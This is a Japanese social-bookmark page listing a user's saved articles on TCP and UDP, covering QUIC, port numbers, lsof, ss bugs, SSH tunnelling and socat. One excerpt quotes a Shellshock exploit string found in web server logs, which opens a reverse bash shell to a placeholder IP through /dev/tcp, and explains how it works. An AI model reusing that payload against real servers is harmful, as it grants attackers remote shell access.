タグ

TCPとUDPに関するiwwのブックマーク (12)

  • bashでリダイレクトを使ったソケット通信 - うまいぼうぶろぐ

    vpsのhttpdのログにbash脆弱性を狙ったアクセスが来ていて、たいていはどこかへpingを実行したり、HTTPヘッダにX-Bash-Test というのを含めて脆弱性を確認してるだけ、みたいなのだけど、その中で見慣れないログを見つけた。 User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.0.2.1/8080 0>&1(/dev/tcp の後は/ipアドレス/port 上のは適当な例) /dev/tcp ? こいつは何がしたい? "/bin/bash -i >& /dev/tcp/192.0.2.1/8080 0>&1" /bin/bash -i を実行したときの標準入力(0)、標準出力(1)、標準エラー(2) 、つまり全ての入出力を/dev/tcp/192.0.2.1/8080 にリダイレクトにしている。(">& hoge.txt"

    bashでリダイレクトを使ったソケット通信 - うまいぼうぶろぐ
    iww
    iww 2020/10/15
    便利そう
  • TCPに代わる高速プロトコルの標準化――QUIC【IETF100 Update Meeting】

    TCPに代わる高速プロトコルの標準化――QUIC【IETF100 Update Meeting】
    iww
    iww 2018/01/27
    SCTP って結局全然流行らずに廃れていったのか。
  • 2008年2月13日 NFS UDPからTCPデフォルトへ変更、procstat(1)にディレクトリ表示機能、Linux LVM論理ボリューム対応、AWFFull登場 | gihyo.jp

    FreeBSD Daily Topics 2008年2月13日NFS UDPからTCPデフォルトへ変更、procstat(1)にディレクトリ表示機能、Linux LVM論理ボリューム対応、AWFFull登場 src procstat(1) current - 2007年12月末に新しくプロセス情報の詳細を表示するためのコマンドprocstat(1)が追加されたわけですが、同コマンドに新しく現在プロセスが作業しているディレクトリ(process current working directory⁠)⁠、ルートディレクトリ、jailディレクトリを表示させる機能が追加されました。 ちなみに同データはすでにfstat(1)コマンドや kern.proc.filedesc sysctl値経由でチェックできます。 図 procstat(1)コマンドの出力例 - Marcus Clarke氏のコミットロ

    2008年2月13日 NFS UDPからTCPデフォルトへ変更、procstat(1)にディレクトリ表示機能、Linux LVM論理ボリューム対応、AWFFull登場 | gihyo.jp
    iww
    iww 2017/10/13
    いつのまにかTCPがデフォルトになってた。
  • List of TCP and UDP port numbers - Wikipedia

    This article has multiple issues. Please help improve it or discuss these issues on the talk page. (Learn how and when to remove these template messages) This article needs additional citations for verification. Please help improve this article by adding citations to reliable sources. Unsourced material may be challenged and removed. Find sources: "List of TCP and UDP port numbers" – news · newspa

    iww
    iww 2017/09/19
    ポート番号
  • 利用しているポート番号からどのプロセスが利用しているか確認する - Qiita

    既にたくさん記事がありますが、メモ。 参考 特定のポート番号をLISTENしているプロセスが知りたい Linuxでアプリケーションが使用中のポート番号を調べるAdd Starwengtadashi LSOF:知ってます → 使えます にする為の記事 環境 以下の環境のLinuxサーバーで調べてみました。 nginxで80ポートを利用 sshdで22ポートを利用 PostgreSQLで5432ポートを利用 lsofコマンドで調べる lsofコマンドは「list open files」ということでプロセスが開いているファイルやディレクトリ(ライブラリなどを含む)とネットワークファイル(インターネットソケットやUNIXドメインソケット)を表示することができるので、ネットワーク調査に使うことができます。 -iオプションを使うことでネットワークで特定ポート番号を使っているものやTCPやUDPプロトコ

    利用しているポート番号からどのプロセスが利用しているか確認する - Qiita
    iww
    iww 2017/05/29
    lsof -i :22
  • Red Hat Enterprise Linux 7.1でもssコマンドは腐っているので使い物にならない - ろば電子が詰まつてゐる

    以前、CentOS 7 (7.0.1406)およびRed Hat Enterprise Linux 7のssコマンドが腐っていたことにビックリして、「ssコマンドはバグと地雷の塊なのでnetstatの代わりにならない」という記事を書きました。 これはどういうお話かと言うと: RHEL 7からはnetstatコマンドなどが収録されているnet-toolsパッケージが非推奨となり、デフォルトではインストールすらされなくなりました。 しかしnetstatコマンドの代替であるssコマンドはかなり雑な感じで、UDPポートを「tcp」と表示するひどいバグがあります というお話でした。 このssコマンドのバグは、2014年2月にRed Hat Bugzillaにも上がっていました。 https://bugzilla.redhat.com/show_bug.cgi?id=1063927 というわけで、さす

    Red Hat Enterprise Linux 7.1でもssコマンドは腐っているので使い物にならない - ろば電子が詰まつてゐる
  • stone (前編)

    実践で学ぶ、一歩進んだサーバ構築・運用術 第 5 回 stone (前編) パケットを中継する stone 拙作の「stone」は, TCP,あるいは UDP のパケットを中継する, アプリケーション・レベルのパケット・リピータです。 特定のホストの特定のポートに対する TCP 接続を, 他のホストの特定のポートへ中継できるので, 便利です。 stone は Linux をはじめとする UNIX 系 OS のほか, Windows NT や Windows98/95,OS/2 の上でも走らせることができます。 stone の公式ホームページは, http://www.gcd.org/sengoku/stone/Welcome.ja.html です。 ● TCP の中継 例えば, GCD*6 の内部 LAN 上のホスト「takatsu」は プライベート・アドレスであるため, 外部からアクセス

  • IPプロトコル番号一覧

    ◆ プロトコル番号 ( IP Protocol Number ) プロトコル番号は、上位層のプロトコルを識別するための番号であり、IPヘッダに 8 ビット情報であります。 例えばプロトコル番号が 6 の場合はTCP、17 の場合はUDPとなります。プロトコル番号の枠は0~255です。 以下は主要なプロトコル番号表です。なお、IANAによるプロトコル番号の最新情報はこちらで確認できます。 ※ プロトコル番号 4 は「IP in IP」のプロトコル番号であり IP のプロトコル番号ではありません。そもそも 以下の一覧情報が、IPの上位層のプロトコル番号を識別するための番号であることを考えれば分かりますよね。 IANAがプロトコル番号 4 のKeywordを「IP」とするから紛らわしい。「IPinIP」とすれば良かったのですが。

  • UDPのパケットをSSHを通してトンネルする

    SSHには標準でTCPのトンネリング機能は付いているのですが, UDPはトンネリングしてくれません. なんとかできないものかと試行錯誤してみました. TCP をトンネル TCPのトンネリングの復習から. 以下のコマンドでクライアントの8080番ポートを,リモートの80番ポートに転送することができます.

  • socat - ソケットリレーツール (proxy) - Tomorrow is always fresh with no mistake in it.@備忘録

    SCTPという、TCPとUDPのよいとこ取りをしたようなプロトコルがある。「SCTP(ネットワーク通信)」に書いたとおり、echoサーバを作成したが、動作確認のためにクライアントが必要になった。 telnetなどのTCP用のツールは使えないので、クライアントのプログラムも作成したが、もっと簡単にためせるツールがないかと思っていたら、「socat」というコマンドを見つけた。 netcat(nc)(「netcat - ネットワーク万能ツール」を参照)をさらに機能強化して、これでもかというくらいいろいろオプションが指定できるようになっている。 あろうことかnetcatでは封印されているコマンドの実行も可能になっている。

    socat - ソケットリレーツール (proxy) - Tomorrow is always fresh with no mistake in it.@備忘録
  • socatを使ってみる | FUture REal LOcation

    複数台のWebサーバ(Apache)が動作している環境で、 アクセスログを簡単に集約できないか調べていた。 アクセスログを、netcat(ncコマンド)を利用して、UDPパケットとしてブロードキャストに投げ、 それをログ収集サーバが受け取ることができないか調べていたが、CentOS付属のnetcatでは出来なかった。 ※詳しくは調べていないが、UDPで待ちうけるように設定した場合、一回通信が開始されると、その待受けポートがなくなってしまう模様。 代わりのものを調べていたら、socatというnetcatの高機能版のようなツールがあった。 TCP/UDPだけではなく、IP,SCTP,PTY,EXEC等多数のプロトコルを扱える。 EPELにsocatパッケージとして登録されている。 # yum install --enablerepo=epel socat ●利用方法 サーバ側は以下のようにして

  • socat メモ

    ■UDPで待受 # socat UDP-LISTEN:10000,fork,reuseaddr STDOUT ■TCPで待受 # socat TCP4-LISTEN:10000,fork,reuseaddr STDOUT ■受信したデータをファイルへ保存 # socat TCP4-LISTEN:10000,fork,reuseaddr OPEN:output.txt,creat=1 ■コマンドサーバ(受信したデータを入力としてコマンドを実行し、結果を返す) echoサーバ # socat TCP4-LISTEN:10000 SYSTEM:cat 時間を返す # socat TCP4-LISTEN:10000,fork,reuseaddr SYSTEM:"date +%s" ■UDPで送信 # socat STDIN UDP-SENDTO:192.168.128.xxx:10000 ■TCP

  • 1